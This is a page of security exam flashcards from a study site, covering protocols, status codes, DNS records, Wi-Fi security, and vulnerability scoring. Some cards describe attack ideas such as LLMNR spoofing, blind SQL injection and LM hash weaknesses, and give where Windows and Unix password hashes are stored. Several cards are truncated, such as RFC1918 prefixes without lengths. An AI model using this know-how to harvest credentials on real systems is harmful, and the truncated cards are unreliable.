



























Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
A concise overview of various network security concepts, protocols, and vulnerabilities. It covers topics such as ipsec, common tcp/udp ports, rfc1918 address blocks, cve, cvss, dread, cwe, and nvd. Additionally, it includes information on authentication protocols like lm, net-ntlm, and ntlm, as well as network scanning tools and various network protocols like peap, leap, and more. The document also touches on sql injection, llmnr spoofing, ftp bounce attacks, and common malware exploits, offering a broad overview of network security essentials. It is useful for students and professionals in cybersecurity.
Typology: Exams
1 / 35
This page cannot be seen from the preview
Don't miss anything!




























100 *** Continue
101 *** Switching Protocols
102 *** Processing
Internet Protocol Security (IPsec) *** a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet Protocol network
Internet Protocol Security (IPsec) *** used in virtual private networks (VPNs)
number of possible TCP ports *** 65535
number of possible UDP ports *** 65535
RFC1918 24-bit block *** 10.0.0.0/
RFC1918 20-bit block *** 172.16.0.0/
RFC1918 16-bit block *** 192.168.0.0/
Common Vulnerabilities and Exposures (CVE) *** provides a reference-method for publicly known information-security vulnerabilities and exposures
Common Vulnerability Scoring System (CVSS) *** an open industry standard for assessing the severity of computer system security vulnerabilities
DREAD *** part of a system for risk-assessing computer security threats
Common Weakness Enumeration (CWE) *** a category system for software weaknesses and vulnerabilities
National Vulnerability Database (NVD) *** the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP)
500 *** Internal Server Error
501 *** Not Implemented
502 *** Bad Gateway
503 *** Service Unavailable
504 *** Gateway Timeout
505 *** HTTP Version Not Supported
511 *** Network Authentication Required
404 *** Not Found
405 *** Method Not Allowed
406 *** Not Acceptable
407 *** Proxy Authentication Required
408 *** Request Timeout
409 *** Conflict
410 *** Gone
411 *** Length Required
413 *** Payload Too Large
426 *** Upgrade Required
429 *** Too Many Requests
threat *** a source of potential disruption, which has the potential to cause a risk
risk *** the combination of consequences of a threat occurring and the likelihood of it doing so
inherent risk *** the risk that an event will occur which may negatively affect the achievement of organisation's objectives, assuming there are no controls in place
residual risk *** the risk which remains after taking controls in to account
Session Initiation Protocol (SIP) *** a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications
SIP requests *** REGISTER; INVITE; ACK; BYE; CANCEL; UPDATE; REFER; PRACK; SUBSCRIBE; NOTIFY; PUBLISH; MESSAGE; INFO; OPTIONS
IPsec security architecture *** Authentication Headers (AH)
Encapsulating Security Payloads (ESP)
Security Associations (SA) - Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE and IKEv2)
LM *** all passwords are converted into uppercase before generating the hash value
LM *** password length is limited to maximum of 14 characters
LM *** a 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately
LM *** if the password is 7 characters or less, then the second half of hash will always produce same constant value (AAD3B435B51404EE)
LM *** the hash value is sent to network servers without salting
nbtstat; nbtscan *** NetBIOS scanning tools:
nbtstat *** a command line utility that is integrated in windows systems and it can unveil information about the NetBIOS names and the remote machine name table or local but only for one host
nbtscan *** a NetBIOS nameserver scanner which has the same functions as nbtstat but it operates on a range of addresses instead of one
PEAP *** a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel
LEAP *** a proprietary wireless LAN authentication method developed by Cisco Systems
LEAP *** uses WEP
stream cipher (symmetric) *** Rivest Cipher 4 (RC4)
symmetric-key block cipher *** Rivest Cipher 5 (RC5)
symmetric-key block cipher *** Data Encryption Standard (DES)
symmetric-key block cipher *** Advanced Encryption Standard (AES)
Media Access Control (MAC) address *** of a device is a unique identifier assigned to a network interface controller (NIC)
48 bits *** Media Access Control (MAC) address size:
Oracle System ID (SID) *** used to uniquely identify a particular database on a system
rlogin; rcp; rsh *** Berkeley r-commands that share the hosts.equiv and .rhosts access-control scheme
permissions required for copying a file into / out of a directory *** source directory: execute and read permission
source file: read permission
target directory: execute and write permission
target file: you don't need any permission since it doesn't exit before you copy it. or write permission if the file exists
blind SQL injection *** a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response - this attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection
Link-Local Multicast Name Resolution (LLMNR) *** a Microsoft Windows protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link
Network Basic Input/Output System (NetBIOS) name service *** identifies systems on a local network by their NetBIOS name
LLMNR spoofing *** Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system.
Internet Explorer *** MS10-002 basis
Aurora *** MS10-002 name
KiTrap0D *** MS10-015 name
Print Spooler Service *** MS10-061 basis
Created *** 201
Accepted *** 202
Non-Authoritative Information *** 203
No Content *** 204
Reset Content *** 205
300 *** Multiple Choices
301 *** Moved Permanently
302 *** Found
307 *** Temporary Redirect
308 *** Permanent Redirect
0 *** Echo Reply
3 *** Destination Unreachable
4 *** Source Quench
5 *** Redirect Message
8 *** Echo Request
9 *** Router Advertisement
10 *** Router Solicitation
11 *** Time Exceeded
30 *** Traceroute
42 *** Extended Echo Request
IEEE 802.11 *** part of the IEEE 802 set of LAN protocols, and specifies the set of media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN) Wi-Fi computer communication in various frequencies, including but not limited to 2, 4, 5, and 60 GHz frequency bands
Kismet *** passive scanner on Linux
Wired Equivalent Privacy (WEP) *** both XXX-40 and XXX-104 were deprecated in 2004
Temporal Key Integrity Protocol (TKIP) *** deprecated in 2012
Wi-Fi Protected Access / Wi-Fi Protected Access II (WPA/WPA2) *** defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)
Extensible Authentication Protocol (EAP) *** an authentication framework frequently used in wireless networks and point-to-point connections
Lightweight Extensible Authentication Protocol (LEAP) *** a proprietary wireless LAN authentication method developed by Cisco
Protected Extensible Authentication Protocol (PEAP) *** a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel
Teletype Network (Telnet) *** a protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection
Teletype Network (Telnet) *** does not encrypt any traffic sent over the connection by default
Hypertext Transfer Protocol (HTTP) *** an application protocol for distributed, collaborative, hypermedia information systems
Hypertext Transfer Protocol (HTTP) *** does not encrypt any traffic sent over the connection
Hypertext Transfer Protocol Secure (HTTPS) *** used for secure communication over a computer network, and widely used on the Internet
File Transfer Protocol (FTP) *** a standard network protocol used for the transfer of computer files between a client and server on a computer network
File Transfer Protocol (FTP) *** does not encrypt any traffic sent over the connection
Secure Shell (SSH) *** a cryptographic network protocol for operating network services securely over an unsecured network
Simple Network Management Protocol (SNMP) *** an Internet Standard protocol for collecting and organising information about managed devices on IP networks and for modifying that information to change device behaviour
using SNMP to attack a network *** the SNMP implementation of Cisco 11.0 and 12.0 is vulnerable to certain denial of service attacks
SNMP authentication *** SNMP v1 sends passwords in clear-text over the network
SNMP autodiscovery *** in SNMP v1 and v2c the community string is broadcast in clear-text to other devices
C:\windows\system32\config\SAM *** password hashes (Windows):
/etc/shadow *** password hashes (Unix):
domain information, registrant contact, administrative contact, technical contact *** information contained within IP and domain registries (WHOIS)
DNS zone transfer *** one of many mechanisms available for administrators to replicate DNS databases across a set of DNS servers
zone *** the portion of the database that is replicated
Start Of [a zone of] Authority (SOA) *** specifies authoritative information about a DNS zone
Mail eXchange (MX) *** domain to mail server
Text (TXT) *** more often carries machine-readable data, opportunistic encryption, etc.
Address (A) *** domain to IP
Name Server (NS) *** domain to a set of name servers
Pointer (PTR) *** IP to a domain
HINFO *** intended to provide information about host CPU type and operating system
Canonical Name (CNAME) *** subdomain to a domain's A record
Usenet newsgroup *** a repository usually within the Usenet system, for messages posted from many users in different locations using Internet
-rwxr-xr-x *** a regular file whose user class has full permissions and whose group and others classes have only the read and execute permissions
0740 *** -rwxr-----
archive, hidden, system, read-only *** traditionally, in Microsoft Windows, files and folders accepted four attributes:
filesystem Access Control List (ACL) *** a data structure (usually a table) containing entries that specify individual user or group rights to specific system objects such as programmes, processes, or files
encryption *** transforms data into another format in such a way that only specific individual(s) can reverse the transformation
encoding *** transforms data into another format using a scheme that is publicly available so that it can easily be reversed
symmetric encryption *** uses the same cryptographic keys for both encryption of plaintext and decryption of ciphertext
asymmetric encryption *** uses pairs of keys: public keys which may be disseminated widely, and private keys which are known only to the owner
symmetric-key block cipher *** DES - Data Encryption Standard
Message-Digest algorithm (MD5) *** hash function producing a 128-bit hash value
512 bits *** MD5 block sizes:
message integrity codes *** a short piece of information used to authenticate a message - in other words, to confirm that the message came from the stated sender (its authenticity) and has not been changed
Hash-based Message Authentication Code (HMAC) *** a specific type of Message Authentication Code (MAC) involving a cryptographic hash function and a secret cryptographic key
firewall *** a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules
firewall *** often categorised as either network firewalls or host-based firewalls
network access control list *** a network filter utilised by routers and some switches to permit and restrict data flows into and out of network interfaces
router *** a networking device that forwards data packets between computer networks
switch *** a computer networking device that connects devices on a computer network by using packet switching to receive, process, and forward data to the destination device
Secure Sockets Layer (SSL) *** a set of cryptographic protocols designed to provide communications security over a computer network
Internet Protocol Security (IPsec) *** a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet protocol network which is used in Virtual Private Networks (VPNs)
Secure Shell (SSH) *** a cryptographic network protocol for operating network services securely over an unsecured network
Secure Shell (SSH) *** typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH
Pretty Good Privacy (PGP) *** an encryption programme that provides cryptographic privacy and authentication for data communication
Pretty Good Privacy (PGP) *** used or signing, encrypting, and decrypting texts, emails, files, directories, and whole disk partitions and to increase the security of email communications
Wired Equivalent Privacy (WEP) *** standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialisation vector (IV) to form the RC4 key
Temporal Key Integrity Protocol (TKIP) *** designed as an interim solution to replace WEP without requiring the replacement of legacy hardware
Wi-Fi Protected Access (WPA) *** defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)
egress filtering *** the practice of monitoring and potentially restricting the flow of information outbound from one network to another
egress filtering *** TCP/IP packets that are being sent out of the internal network are examined via a router, firewall, or similar edge device